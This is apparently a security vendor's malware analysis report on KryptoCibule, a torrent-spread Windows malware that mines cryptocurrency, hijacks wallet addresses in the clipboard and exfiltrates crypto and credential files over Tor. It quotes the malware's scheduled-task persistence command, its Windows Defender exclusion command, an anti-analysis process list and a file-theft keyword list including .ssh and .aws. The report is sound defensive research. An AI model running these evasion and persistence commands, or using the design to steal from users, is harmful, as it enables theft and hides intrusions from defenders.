ESET researchers have uncovered a hitherto undocumented malware family that we named KryptoCibule. This malware is a triple threat in regard to cryptocurrencies. It uses the victim's resources to mine coins, tries to hijack transactions by replacing wallet addresses in the clipboard, and exfiltrates cryptocurrency-related files, all while deploying multiple techniques to avoid detection. KryptoCibule makes extensive use of the Tor network and the BitTorrent protocol in its communication infrastructure.
The malware, written in C#, also employs some legitimate software. Some, such as Tor and the Transmission torrent client, are bundled with the installer; others are downloaded at runtime, including Apache httpd and the Buru SFTP server. An overview of the various components and their interactions is shown in Figure 1.
When the malware is first executed, the host is assigned a unique identifier with the format {adjective}-{noun} where {adjective} and {noun} are random words taken from two hardcoded lists which provide over 10 million unique combinations. This identifier is then used to identify the host in communications with the C&C servers.
On top of the crypto-related components, KryptoCibule also has RAT functionality. Among the commands it supports are EXEC, which allows execution of arbitrary commands and SHELL, which downloads a PowerShell script from the C&C. This script then loads a backdoor generated with the post-exploitation tool Pupy.
The name KryptoCibule derives from the Czech and Slovak words for “crypto” and “onion”.
Timeline
We have uncovered multiple versions of this malware, enabling us to trace its evolution all the way back to December 2018. Figure 2 shows the changes made over time to KryptoCibule.
Targets
According to ESET telemetry (shown in Figure 3), the malware seems to target mostly users in Czechia (the Czech Republic) and Slovakia. This reflects the user base of the site on which the infected torrents are found.
Almost all the malicious torrents were available on uloz.to; a popular file sharing site in Czechia and Slovakia (see Figure 4). We'll explain how these torrents are used to spread KryptoCibule in the next section.
As detailed in the Anti-detection and anti-analysis techniques section below, KryptoCibule specifically checks for ESET, Avast, and AVG endpoint security products; ESET is headquartered in Slovakia, while the other two are owned by Avast, which is headquartered in Czechia.
Torrents
KryptoCibule makes use of the BitTorrent protocol to spread to new victims and to download additional tools and updates.
Initial Compromise
KryptoCibule is spread through malicious torrents for ZIP files whose contents masquerade as installers for cracked or pirated software and games. Although other files may be included, as seen in Figure 5, there are five that are common to all KryptoCibule installer archives. packed.001 is the malware, while packed.002 is the installer for the expected software. Both are XOR-encrypted with keys contained in Setup.exe.
When Setup.exe is executed, it decodes both the malware and the expected installer files. It then launches the malware – in the background – and the expected installer – front and center – giving the victim no indication that anything is amiss.
Additional software and updates
The BitTorrent protocol is also used to download updates to the malware, and additional software.
KryptoCibule installs the transmission-daemon torrent client and manages it by issuing commands via its RPC interface on port 9091 with transmission-remote. The RPC interface uses the hardcoded credentials superman:krypton.
To install further software for the malware’s use, such as the SFTP server, the Launcher component makes an HTTP GET request to %C&C%/softwareinfo?title=<software name> and receives a JSON response containing a magnet URI for the torrent to download and other information indicating how to install and execute the program. Figure 6 shows an example of such a response.
{"Magnet": "magnet:?xt=urn[:]btih:67yd647nivxhumoedvwnwnzve55b3bxj&dn=free-BuruServer-x64-v1.7.3.zip", "Version": 1,"ExecutableRelativePath": "", "ExecutableFileName": "buru.exe","ExecutableArgs": "run", "InstallFile": "", "HasCustomConfig": true}
Figure 6. Sample response for a GET /softwareinfo?title=ssh_server request
The mechanism for getting updates is similar. The malware first gets global settings via HTTP from %C&C%/settingsv5. Among other things, this response contains a magnet URI for the latest version of the malware. It then makes a GET request to %C&C%/version to get the most recent version number. If the local version is lower than that version, the torrent is downloaded and installed.
Torrents are added to Transmission using the following command:
transmission-remote localhost -n superman:krypton -a "<magnet URI>"
A hardcoded list of 50 trackers is used to get peers for all torrents.
Seeding malicious torrents
Victims are also used to seed both the torrents used by the malware and the malicious torrents that help spread it. Infected hosts get a list of magnet URIs from %C&C%/magnets, download them all and keep seeding them. This ensures that these files are widely available for others to download, which helps speed up the downloads and provides redundancy.
Anti-detection and anti-analysis techniques
This malware leverages a variety of techniques to avoid detection, along with some basic anti-analysis protections.
It starts with the initial access vector. The executable contained inside the ZIP archive is a rather benign installer program that masquerades as the legitimate InstallShield program. This file is scrambled with the open source program Obfuscar. This same tool is used on all of the malware's custom executables. The malicious code itself is located inside an XOR-encrypted file, the key being a GUID hardcoded in Setup.exe.
The malware is then installed to the hardcoded path %ProgramFiles(x86)%\Adobe\Acrobat Reader DC\Reader\update and uses legitimate Adobe Acrobat Reader executable names for the bundled Tor executable and its own. Some of the files contained in the install folder can be seen in Figure 7.
To achieve persistence, KryptoCibule creates a scheduled task to be run every five minutes with the following command. Once again, it uses an Adobe Reader-related name.
schtasks.exe /CREATE /SC MINUTE /MO 5 /TN "Adobe Update Task" /TR \""%ProgramFiles(x86)%\Adobe\Acrobat Reader DC\Reader\Update\armsvc.exe\"" [/RL HIGHEST] /F [/RU SYSTEM]
Before first executing its payload and on every iteration of the main loop, the malware performs a check for running analysis software using the following list. If any process with a matching name is found, it stops all running components and exits.
- cain
- filemon
- netmon
- netstat
- nmwifi
- perfmon
- processhacker
- procexp
- procexp64
- procmon
- regmon
- tasklist
- taskmgr
- tcpvcon
- tcpview
- wireshark
Antivirus evasion
Before initializing the cryptominer components, the malware performs a case-insensitive check of the rootSecurityCenter2\AntiVirusProduct WMI object for the strings avast, avg and eset, as seen in the decompiled code in Figure 8. Should any of these strings be detected If any of them were detected, the cryptominer components will not be installed.
Whenever the malware installs itself, an update or a new component, the install path used is excluded from Windows Defender automatic scanning by issuing the following command:
powershell -c "Add-MpPreference -ExclusionPath '<install path>'"
It also creates firewall rules using innocuous-looking names to explicitly allow inbound and outbound traffic from its components. A rule to block outbound traffic from the ESET Kernel Service (ekrn.exe) is also created by the function shown in Figure 9.
Tor network usage
KryptoCibule brings along the tor.exe command line tool, masquerading as ADelRCP.exe, and a configuration file (seen in Figure 10) as libstringutils.dll.
This sets up a SOCKS proxy on port 9050 that is used by the malware to relay all communications with the C&C servers through the Tor network. This has the dual benefit of encrypting the communications and making it virtually impossible to trace the actual server or servers behind these URIs.
The second part of the configuration file sets up onion services on the victimized host. These are accessible by the operators over the Tor network. When first starting up these services, Tor automatically generates a .onion URI for the host. This unique hostname is then sent to %C&C%/transferhost/<unique name>. We will discuss how these onion services are used in the upcoming sections.
Port Number | Service |
---|---|
9091 | Transmission Daemon RPC interface |
9999 | Apache httpd server |
9187 | Buru SFTP server |
9188 | Buru Web Admin |
12461 | MiniWeb HTTP server |
The onion URIs for two C&C servers are contained in the malware. One of these provides a REST API that the malware uses for most communications, while the other is used to download files. Additional URIs can be obtained one at a time with a request to %C&C%/server. Some older versions of the malware use these to download updates via port 12461. We believe that these URIs point to other infected hosts. The versions of the malware that use them have code to place their downloaded updates into a directory served by the MiniWeb HTTP server on that same port.
We were able to identify one IP address for the file server C&C in our telemetry data.
Acquiring cryptocurrency
KryptoCibule has three components that leverage infected hosts in order to obtain cryptocurrencies.
Cryptomining
The latest versions of KryptoCibule use XMRig, an open source program that mines Monero using the CPU, and kawpowminer, another open source program that mines Ethereum using the GPU. The second one is only used if a dedicated GPU is found on the host. Both of these programs are set up to connect to an operator-controlled mining server over the Tor proxy.
On every iteration of the main loop, the malware checks the battery level and the time since the last user input. It then starts or stops the miner processes based on this information. If the host has received no user input in the last 3 minutes and has at least 30% battery, both the GPU and CPU miners are run without limits. Otherwise, the GPU miner is suspended, and the CPU miner is limited to one thread. If the battery level is under 10%, both miners are stopped. This is done to reduce the likelihood of being noticed by the victim.
Clipboard hijacking
The second component masquerades as SystemArchitectureTranslation.exe. It uses the AddClipboardFormatListener function to monitor changes to the clipboard and to apply the replacement rules obtained from %C&C%/regexes to its content. The code for this listener is shown in Figure 11. The value 0x31D corresponds to the WM_CLIPBOARDUPDATE constant.
These rules, in the form <regular_expresssion>!<wallet>, match the format of cryptocurrency wallet addresses and replace them with addresses of wallets controlled by the malware operator. This is an attempt to redirect transactions made by the victim to the operator's wallets. This component uses a FileSystemWatcher to reload replacement rules whenever the settings.cfg file is changed.
At the time of this writing, the wallets used by the clipboard hijacking component had received a little over US$1800 in Bitcoin and Ethereum. One such wallet is shown in Figure 12. By correlating wallets used as sources in the same transactions as known ones, we were able to uncover at least four additional Bitcoin wallets that likely belong to KryptoCibule's operators.
File exfiltration
The third component walks through the filesystem of each available drive and looks for filenames that contain certain terms. A list of such terms we obtained during our investigation is shown in Figure 13.
["wallet.dat", "utc--2014", "utc--2015", "utc--2016", "utc--2017", "utc--2018", "utc--2019", "utc--2020", ".address.txt", "electrum", "bitcoin", "litecoin", "ethereum", "cardano", "zcash", "monero", "cripto", "krypto", "binance", "tradeogre", "coinbase", "tether", "daedalus", "stellar", "tezos", "chainlink", "blockchain", "verge", "bittrex", "ontology", "vechain", "doge", "qtum", "augur", "omisego", "digibyte", "seele", "enjin", "steem", "bytecoin", "zilliqa", "zcoin", "miner", "xmrig", "xmr-stak","electroneum", "heslo", "waves", "banka", "crypto", "hesla", "seed", "metamask", "antminer", "trezor", "ledger", "private", "trx", "exodus", "password", "jaxx", "guarda", "atomic.exe", "copay.exe", "Green Address Wallet.exe", "msigna.exe", "ArmoryQT.exe", ".ssh", ".aws", "Desktop"]
Figure 13. A list of words to search for, taken from the GET %C&C%/settingsv5 response
Most terms refer to cryptocurrencies, wallets or miners, but a few more generic ones like crypto (in several languages), seed and password are present also. The list contains similar terms in Czech and Slovak such as heslo, hesla and banka (these are the words for "password", "passwords" and "bank", respectively). A few terms also correspond to paths or files that could provide other interesting data (Desktop, private) including private keys (.ssh, .aws). It gathers the full path of each of the matching files and sends the list to %C&C%/found/<unique name>.
We believe that this works in tandem with the SFTP server running as an onion service on port 9187. This server creates mappings for every available drive and makes them available using credentials hardcoded in the malware. The gathered paths can thus be used for file exfiltration by having an attacker-controlled machine request them from the infected host over SFTP.
KryptoCibule also installs a legitimate Apache httpd server that is configured to act as a forward proxy without any restrictions and that is reachable as an onion service on port 9999.
Conclusion
The KryptoCibule malware has been in the wild since late 2018 and is still active, but it doesn't seem to have attracted much attention until now. Its use of legitimate open-source tools along with the wide range of anti-detection methods deployed are likely responsible for this. The relatively low number of victims (in the hundreds) and their being mostly confined to two countries may also contribute to this. New capabilities have regularly been added to KryptoCibule over its lifetime and it continues to be under active development.
Presumably the malware operators were able to earn more money by stealing wallets and mining cryptocurrencies than what we found in the wallets used by the clipboard hijacking component. The revenue generated by that component alone does not seem enough to justify the development effort observed.
Indicators of Compromise (IoCs)
The comprehensive list of Indicators of Compromise (IoCs) and samples can be found in our GitHub repository.
Samples
SHA-1 | Filename | ESET detection name |
---|---|---|
3BCEF852639F85803974943FC34EFF2D6D7D916D | armsvc.exe | MSIL/KryptoCibule.A |
352743EBE6A0638CC0614216AD000B6A43C4D46E | SystemArchitectureTranslation.exe | MSIL/KryptoCibule.A |
70480D5F4CB10DE42DD2C863DDF57102BE6FA9E0 | Updater.exe | MSIL/KryptoCibule.A |
2E568CDF9B28824FBA1D7C16D8D0BE1D73A3FEBA | Setup.exe | MSIL/KryptoCibule.A |
Network
- rlwryismmgjijryr55u5rqlbqghqvrwxe5qgxupuviyysxkky5wah6yd.onion
- 4dtu3lxrpx6nn7snjovoc3ldiy4x67k7qsrgzftvkrttoqbwnsuirhqd.onion
- v6lajszeqfkt3h2nptorindpf3mow5p3thrx2vuqbqzbv3tjrcqmgdqd.onion
Scheduled Tasks
Name | Executable Path |
---|---|
GoogleUpdateTask | %LocalAppData%\Microsoft\Architecture\SystemArchitectureTranslation.exe |
Adobe Update Task | %ProgramFiles(X86)%\Adobe\Acrobat Reader DC\Reader\Update\armsvc.exe |
MITRE ATT&CK techniques
This table was built using version 7 of the ATT&CK framework.
Tactic | ID | Name | Description |
---|---|---|---|
Initial Access | T1189 | Drive-by Compromise | KryptoCibule is spread through torrent and file-sharing websites. |
Execution | T1059.001 | Command and Scripting Interpreter: PowerShell | KryptoCibule directly executes PowerShell commands. Some commands received from the C&C use PowerShell. |
T1059.003 | Command and Scripting Interpreter: Windows Command Shell | Commands received from the KryptoCibule C&C are executed with cmd.exe. | |
T1106 | Native API | KryptoCibule uses the System.Diagnostics.Process C# class to run processes. | |
T1204.002 | User Execution: Malicious File | KryptoCibule requires victims to run an installer from a downloaded torrent. | |
Persistence | T1053.005 | Scheduled Task/Job: Scheduled Task | KryptoCibule attains persistence by creating a scheduled task to run the main executable every five minutes. |
Defense Evasion | T1027 | Obfuscated Files or Information | KryptoCibule executables are obfuscated with Obfuscar. |
T1036 | Masquerading | KryptoCibule components use misleading names and a configuration file masquerades as a DLL. | |
T1036.004 | Masquerading: Masquerade Task or Service | KryptoCibule tasks are named after legitimate and benign looking software. | |
T1036.005 | Masquerading: Match Legitimate Name or Location | KryptoCibule uses paths and filenames that match those of Adobe Reader for malware and Tor client. BuruServer uses paths and filenames for OpenSSH. Transmission is installed to Java runtime directories. |
|
T1140 | Deobfuscate/Decode Files or Information | The files that come with the KryptoCibule installer are XOR-encrypted. PowerShell commands from the KryptoCibule C&C are base64-encoded. |
|
T1497 | Virtualization/Sandbox Evasion | The KryptoCibule payload is not executed if an analysis tool is detected. | |
T1497.002 | Virtualization/Sandbox Evasion: User Activity Based Checks | KryptoCibule uses the time since last input to set limits on cryptominer CPU usage. | |
T1562.001 | Impair Defenses: Disable or Modify Tools | KryptoCibule uses Add-MpPreference -ExclusionPath to exclude malware and installed tools from Windows Defender scanning. | |
T1562.004 | Impair Defenses: Disable or Modify System Firewall | KryptoCibule uses advfirewall firewall add rule to allow its tools and block the ESET Kernel Service. | |
T1564.003 | Hide Artifacts: Hidden Window | KryptoCibule hides process windows using the windowstyle hidden option. | |
Discovery | T1057 | Process Discovery | KryptoCibule uses System.Diagnostics.Process.GetProcesses to get a list of running processes. |
T1082 | System Information Discovery | KryptoCibule obtains information about host’s timezone, locale, power status, OS and hardware. | |
T1083 | File and Directory Discovery | KryptoCibule has a component that looks for files on the local file system. | |
T1518.001 | Software Discovery: Security Software Discovery | KryptoCibule looks for antivirus software in the root\\SecurityCenter2 → AntivirusProduct ManagementObject. The cryptominer component is not installed if it detects an installed antivirus product. |
|
Collection | T1005 | Data from Local System | KryptoCibule learches all attached drives for a list of filenames . |
T1119 | Automated Collection | KryptoCibule programmatically collect paths for files to be exfiltrated. | |
Command and Control | T1071.001 | Application Layer Protocol: Web Protocols | KryptoCibule uses HTTP for C&C communication. |
T1071.002 | File Transfer Protocols | KryptoCibule downloads updates and additional tools via BitTorrent. | |
T1090.003 | Proxy: Multi-hop Proxy | KryptoCibule bundles Tor and uses it as a SOCKS proxy to communicate with its C&C. | |
T1105 | Ingress Tool Transfer | KryptoCibule downloads additional tools using BitTorrent. | |
T1568 | Dynamic Resolution | KryptoCibule gets additional onion URIs over HTTP. | |
T1571 | Non-Standard Port | KryptoCibule uses port 9187 for SFTP server, and 9999 and 12461 for HTTP servers. | |
Exfiltration | T1020 | Automated Exfiltration | Logs, file locations and system info are automatically collected and sent to the KryptoCibule C&C. |
T1041 | Exfiltration Over C2 Channel | Logs, file locations and system info are sent via the KryptoCibule HTTP C&C channel. | |
T1048 | Exfiltration Over Alternative Protocol | KryptoCibule exfiltrates files over SFTP. | |
Impact | T1496 | Resource Hijacking | KryptoCibule uses XMRig and Kawpowminer to mine cryptocurrency on victim systems. |
T1565 | Data Manipulation | KryptoCibule replaces cryptocurrency wallet addresses in the clipboard in an attempt to hijack transfers. |